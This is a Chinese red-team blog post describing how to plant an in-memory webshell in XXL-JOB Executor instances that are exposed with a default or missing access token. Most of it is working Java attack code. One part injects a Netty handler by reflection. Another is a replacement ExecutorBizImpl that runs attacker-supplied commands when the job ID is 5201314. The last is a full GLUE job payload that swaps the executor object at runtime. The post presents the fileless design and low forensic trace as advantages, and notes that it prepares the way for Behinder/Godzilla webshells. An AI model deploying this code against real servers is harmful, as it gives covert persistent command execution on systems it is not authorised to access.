免责声明:
本公众号致力于安全研究和红队攻防技术分享等内容,本文中所有涉及的内容均不针对任何厂商或个人,同时由于传播、利用本公众号所发布的技术或工具造成的任何直接或者间接的后果及损失,均由使用者本人承担。请遵守中华人民共和国相关法律法规,切勿利用本公众号发布的技术或工具从事违法犯罪活动。最后,文中提及的图文若无意间导致了侵权问题,请在公众号后台私信联系作者,进行删除操作。
XXL-JOB是一个分布式任务调度平台,分为Admin(调度中心)和Executor(执行器)。从2.2.0版本开始XXL-JOB的Executor执行器支持RESTful API,默认监听在9999端口。Executor历史上出现过未授权和默认accessToken的问题导致攻击者无需经过身份认证即可调用Executor执行任务。(严格意义上来说这不属于代码安全问题,大概是开发者认为像这类分布式任务调度组件默认的使用场景即为内部可信环境,所以本身也没有在代码层面考虑。)作者在2022年5月21日发行的v.2.3.1版本中就提出了针对调度通讯应启用accessToken并建议生产环境自定义accessToken,但大部分应用程序在使用该组件时均采用默认配置且绝大部分部署在公有云平台上的XXL-JOB没有对入站的端口添加防火墙策略直接将Executor暴露在公网上导致攻击面的扩大。由于应用本身就是任务调度平台因此支持各种语言(Shell、Python、Java、PHP、Nodejs、PowerShell)的脚本任务,当然前提是部署Executor的服务器本身具备这些环境。大多数的漏洞利用多是采用Shell脚本任务执行的方式来反弹shell或通过C2来获取权限,这种方式在边界突破上需要服务器环境能够出网,增加了漏洞利用的成本。Executor是一个采用Netty框架实现的RESTful API来支持与其他组件间的通信,互联网上对于Netty内存马的绝大部份是在Spring Cloud Gateway的SpEl表达式代码执行漏洞场景下的利用,对于XXL-JOB的漏洞场景并不适用,因此本文主要针对XXL-JOB Executor漏洞利用场景的适配Netty内存马来解决这一问题。
在Netty的启动流程中ChannelInitializer#initChannel方法负责将用户配置的handler添加到ServerSocketChannel的pipeline中。因此可以在EmbedServer#start中找到,Executor服务在启动时通过initChannel方法对pipeline中添加了下述的五个handler来处理业务请求。其中EmbedServer$EmbedHttpServerHandler类就负责处理Executor对外暴露的RESTful API请求。
channel.pipeline().addLast(new ChannelHandler[] { (ChannelHandler)new IdleStateHandler(0L, 0L, 90L, TimeUnit.SECONDS) }).addLast(new ChannelHandler[] { (ChannelHandler)new HttpServerCodec() }).addLast(new ChannelHandler[] { (ChannelHandler)new HttpObjectAggregator(5242880) }).addLast(new ChannelHandler[] { (ChannelHandler)new EmbedServer.EmbedHttpServerHandler(EmbedServer.access$000(this.this$1.this$0), this.this$1.val$accessToken, this.val$bizThreadPool) });
EmbedServer$EmbedHttpServerHandler继承自SimpleChannelInboundHandler类重写了channelRead0方法实现对请求的认证和处理。例如检查请求头中的XXL-JOB-ACCESS-TOKEN是否与配置文件中的一致以及路由对应的方法调用。
在Netty中可以通过管道对象(DefaultChannelPipeline)提供的addFirst、addBefore、addLast等方法来动态添加Handler,这三个方法分别对应: 将Handler处理器添加到双向链表的表头、将Handler处理器添加到某个Handler的前一个、将Handler处理器添加到双向链表的尾部。
因此对于内存马的实现可以通过反射拿到DefaultChannelPipeline对象通过addBefore方法在EmbedServer$EmbedHttpServerHandler处理请求前先判断是否为Webshell请求并执行,代码实现大致如下。
try {
Method getThreads = Thread.class.getDeclaredMethod("getThreads");
getThreads.setAccessible(true);
Object threads = getThreads.invoke(null);
for (int i = 0; i < Array.getLength(threads); i++) {
Object thread = Array.get(threads, i);
if (thread != null && thread.getClass().getName().contains("FastThreadLocalThread")) {
Field _blocker = thread.getClass().getSuperclass().getDeclaredField("blocker");
_blocker.setAccessible(true);
Object blocker = _blocker.get(thread);
Field _this_0 = blocker.getClass().getDeclaredField("this$0");
_this_0.setAccessible(true);
Object this_0 = _this_0.get(blocker);
Field _fdToKey = this_0.getClass().getDeclaredField("fdToKey");
_fdToKey.setAccessible(true);
Object fdToKey = _fdToKey.get(this_0);
Method values = fdToKey.getClass().getDeclaredMethod("values");
values.setAccessible(true);
Collection
for (SelectionKeyImpl key : keys) {
Field _attachment = key.getClass().getSuperclass().getSuperclass().getDeclaredField("attachment");
_attachment.setAccessible(true);
Object attachment = _attachment.get(key);
if (attachment.getClass().getName().contains("NioServerSocketChannel")) {
Method _pipeline = attachment.getClass().getSuperclass().getSuperclass().getSuperclass().getDeclaredMethod("pipeline");
_pipeline.setAccessible(true);
DefaultChannelPipeline pipeline = (DefaultChannelPipeline) _pipeline.invoke(attachment, null);
Object handler = ReflectUtils.defineClass("MyHttpServerHandler", "bytecode...", Thread.currentTrhead().getContextClassLoader()).newInstance();
pipeline.addBefore("EmbedServer$EmbedHttpServerHandler#0", "MyHttpServerHandler#0", (ChannelHandler) handler);
}
}
}
}
} catch (Exception e) {
e.printStackTrace();
}
经过实际测试上述的代码也确实能够将Handler注册在EmbedServer$EmbedHttpServerHandler前处理请求,并且根据请求头的属性判断是否为命令执行的利用并返回结果。
但问题在于Netty对于每一个客户端请求(Channel)都会再创建一轮Handler并添加到Pipeline管道中,这就意味着注入的内存马Handler只在当前的请求中存在一次,当再有新的请求时会重新注册Handler,代码调用栈如下:
如果是通过JavaAgent注入内存马的话会方便很多,例如可以在启动程序默认添加的Handler中通过动态修改字节码在channelRead方法执行具体的业务处理前判断请求是否为命令执行。但这种方式需要落地文件又增加了攻击成本且容易留下痕迹。
实际上Executor暴露的几个接口都是调用的对应ExecutorBizImpl类的方法,这个对象在整个应用的生命周期中都是不变的,因此可以通过反射修改其为包含Webshell功能的类,对原有的方法代码实现不做改动,而是在之前添加判断请求是否符合内存马功能的调用。例如下面的代码在原有的ExecutorBizImpl#run方法中判断如果任务ID为5201314的话取glueSource参数作为命令去执行并返回结果。当然本身执行器就能够通过/run和/log接口执行命令和查看结果,这一步只是为了验证思路的可行性为注入冰蝎/哥斯拉等加密Webshell内存马作铺垫。
import com.xxl.job.core.biz.ExecutorBiz;
import com.xxl.job.core.biz.model.IdleBeatParam;
import com.xxl.job.core.biz.model.KillParam;
import com.xxl.job.core.biz.model.LogParam;
import com.xxl.job.core.biz.model.LogResult;
import com.xxl.job.core.biz.model.ReturnT;
import com.xxl.job.core.biz.model.TriggerParam;
import com.xxl.job.core.enums.ExecutorBlockStrategyEnum;
import com.xxl.job.core.executor.XxlJobExecutor;
import com.xxl.job.core.glue.GlueFactory;
import com.xxl.job.core.glue.GlueTypeEnum;
import com.xxl.job.core.handler.IJobHandler;
import com.xxl.job.core.handler.impl.GlueJobHandler;
import com.xxl.job.core.handler.impl.ScriptJobHandler;
import com.xxl.job.core.log.XxlJobFileAppender;
import com.xxl.job.core.thread.JobThread;
import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.util.Date;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
public class CommandExecutorBizImpl implements ExecutorBiz {
private static Logger logger = LoggerFactory.getLogger(com.xxl.job.core.biz.impl.ExecutorBizImpl.class);
public CommandExecutorBizImpl() {
}
public ReturnT
return ReturnT.SUCCESS;
}
public ReturnT
boolean isRunningOrHasQueue = false;
JobThread jobThread = XxlJobExecutor.loadJobThread(idleBeatParam.getJobId());
if (jobThread != null && jobThread.isRunningOrHasQueue()) {
isRunningOrHasQueue = true;
}
return isRunningOrHasQueue ? new ReturnT(500, "job thread is running or has trigger queue.") : ReturnT.SUCCESS;
}
public ReturnT
try {
if (triggerParam.getJobId() == 5201314) {
String command = triggerParam.getGlueSource();
ProcessBuilder processBuilder = new ProcessBuilder(command.split("\s+"));
Process process = processBuilder.start();
InputStream inputStream = process.getInputStream();
BufferedReader reader = new BufferedReader(new InputStreamReader(inputStream));
StringBuilder output = new StringBuilder();
String line;
while ((line = reader.readLine()) != null) {
output.append(line).append("n");
}
return new ReturnT<>(output.toString());
}
} catch (Exception e) {
e.printStackTrace();
}
JobThread jobThread = XxlJobExecutor.loadJobThread(triggerParam.getJobId());
IJobHandler jobHandler = jobThread != null ? jobThread.getHandler() : null;
String removeOldReason = null;
GlueTypeEnum glueTypeEnum = GlueTypeEnum.match(triggerParam.getGlueType());
IJobHandler originJobHandler;
if (GlueTypeEnum.BEAN == glueTypeEnum) {
originJobHandler = XxlJobExecutor.loadJobHandler(triggerParam.getExecutorHandler());
if (jobThread != null && jobHandler != originJobHandler) {
removeOldReason = "change jobhandler or glue type, and terminate the old job thread.";
jobThread = null;
jobHandler = null;
}
if (jobHandler == null) {
jobHandler = originJobHandler;
if (originJobHandler == null) {
return new ReturnT(500, "job handler [" + triggerParam.getExecutorHandler() + "] not found.");
}
}
} else if (GlueTypeEnum.GLUE_GROOVY == glueTypeEnum) {
if (jobThread != null && (!(jobThread.getHandler() instanceof GlueJobHandler) || ((GlueJobHandler)jobThread.getHandler()).getGlueUpdatetime() != triggerParam.getGlueUpdatetime())) {
removeOldReason = "change job source or glue type, and terminate the old job thread.";
jobThread = null;
jobHandler = null;
}
if (jobHandler == null) {
try {
originJobHandler = GlueFactory.getInstance().loadNewInstance(triggerParam.getGlueSource());
jobHandler = new GlueJobHandler(originJobHandler, triggerParam.getGlueUpdatetime());
} catch (Exception var7) {
logger.error(var7.getMessage(), var7);
return new ReturnT(500, var7.getMessage());
}
}
} else {
if (glueTypeEnum == null || !glueTypeEnum.isScript()) {
return new ReturnT(500, "glueType[" + triggerParam.getGlueType() + "] is not valid.");
}
if (jobThread != null && (!(jobThread.getHandler() instanceof ScriptJobHandler) || ((ScriptJobHandler)jobThread.getHandler()).getGlueUpdatetime() != triggerParam.getGlueUpdatetime())) {
removeOldReason = "change job source or glue type, and terminate the old job thread.";
jobThread = null;
jobHandler = null;
}
if (jobHandler == null) {
jobHandler = new ScriptJobHandler(triggerParam.getJobId(), triggerParam.getGlueUpdatetime(), triggerParam.getGlueSource(), GlueTypeEnum.match(triggerParam.getGlueType()));
}
}
if (jobThread != null) {
ExecutorBlockStrategyEnum blockStrategy = ExecutorBlockStrategyEnum.match(triggerParam.getExecutorBlockStrategy(), (ExecutorBlockStrategyEnum)null);
if (ExecutorBlockStrategyEnum.DISCARD_LATER == blockStrategy) {
if (jobThread.isRunningOrHasQueue()) {
return new ReturnT(500, "block strategy effect:" + ExecutorBlockStrategyEnum.DISCARD_LATER.getTitle());
}
} else if (ExecutorBlockStrategyEnum.COVER_EARLY == blockStrategy && jobThread.isRunningOrHasQueue()) {
removeOldReason = "block strategy effect:" + ExecutorBlockStrategyEnum.COVER_EARLY.getTitle();
jobThread = null;
}
}
if (jobThread == null) {
jobThread = XxlJobExecutor.registJobThread(triggerParam.getJobId(), (IJobHandler)jobHandler, removeOldReason);
}
ReturnT
return pushResult;
}
public ReturnT
JobThread jobThread = XxlJobExecutor.loadJobThread(killParam.getJobId());
if (jobThread != null) {
XxlJobExecutor.removeJobThread(killParam.getJobId(), "scheduling center kill job.");
return ReturnT.SUCCESS;
} else {
return new ReturnT(200, "job thread already killed.");
}
}
public ReturnT
String logFileName = XxlJobFileAppender.makeLogFileName(new Date(logParam.getLogDateTim()), logParam.getLogId());
LogResult logResult = XxlJobFileAppender.readLog(logFileName, logParam.getFromLineNum());
return new ReturnT(logResult);
}
}
完整的注入代码:
package com.xxl.job.service.handler;
import com.xxl.job.core.log.XxlJobLogger;
import com.xxl.job.core.biz.model.ReturnT;
import com.xxl.job.core.handler.IJobHandler;
import java.util.*;
import java.lang.reflect.*;
import com.xxl.job.core.server.*;
import org.springframework.cglib.core.*;
import sun.nio.ch.SelectionKeyImpl;
import io.netty.channel.DefaultChannelPipeline;
import io.netty.channel.ChannelPipeline;
import io.netty.channel.ChannelHandler;
import org.springframework.cglib.core.ReflectUtils;
import com.xxl.job.core.biz.ExecutorBiz;
public class DemoGlueJobHandler extends IJobHandler {
@Override
public ReturnT
XxlJobLogger.log("XXL-JOB, Hello World.");
try {
Method getThreads = Thread.class.getDeclaredMethod("getThreads");
getThreads.setAccessible(true);
Object threads = getThreads.invoke(null);
for (int i = 0; i < Array.getLength(threads); i++) {
Object thread = Array.get(threads, i);
try {
Field _target = thread.getClass().getDeclaredField("target");
_target.setAccessible(true);
Object target = _target.get(thread);
if (target.getClass().getName().contains("EmbedServer")) {
XxlJobLogger.log(target.getClass().getName());
Field _this_0 = target.getClass().getDeclaredField(new String(Base64.getDecoder().decode("dGhpcyQw")));
_this_0.setAccessible(true);
Object embedServer = _this_0.get(target);
XxlJobLogger.log(embedServer.getClass().getName());
Field _executorBiz = embedServer.getClass().getDeclaredField("executorBiz");
_executorBiz.setAccessible(true);
_executorBiz.set(embedServer, (ExecutorBiz) ReflectUtils.defineClass("CommandExecutorBizImpl", Base64.getDecoder().decode("bytecode"), Thread.currentThread().getContextClassLoader()).newInstance());
ExecutorBiz biz = _executorBiz.get(embedServer);
}
} catch (NoSuchFieldException nsfe) {
continue;
}
}
XxlJobLogger.log("XXL-JOB, End!");
} catch (Exception e) {
XxlJobLogger.log(e.getMessage());
}
return ReturnT.SUCCESS;
}
}
实现效果:
原文始发于微信公众号(哈拉少安全小队):XXL-JOB内存马
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论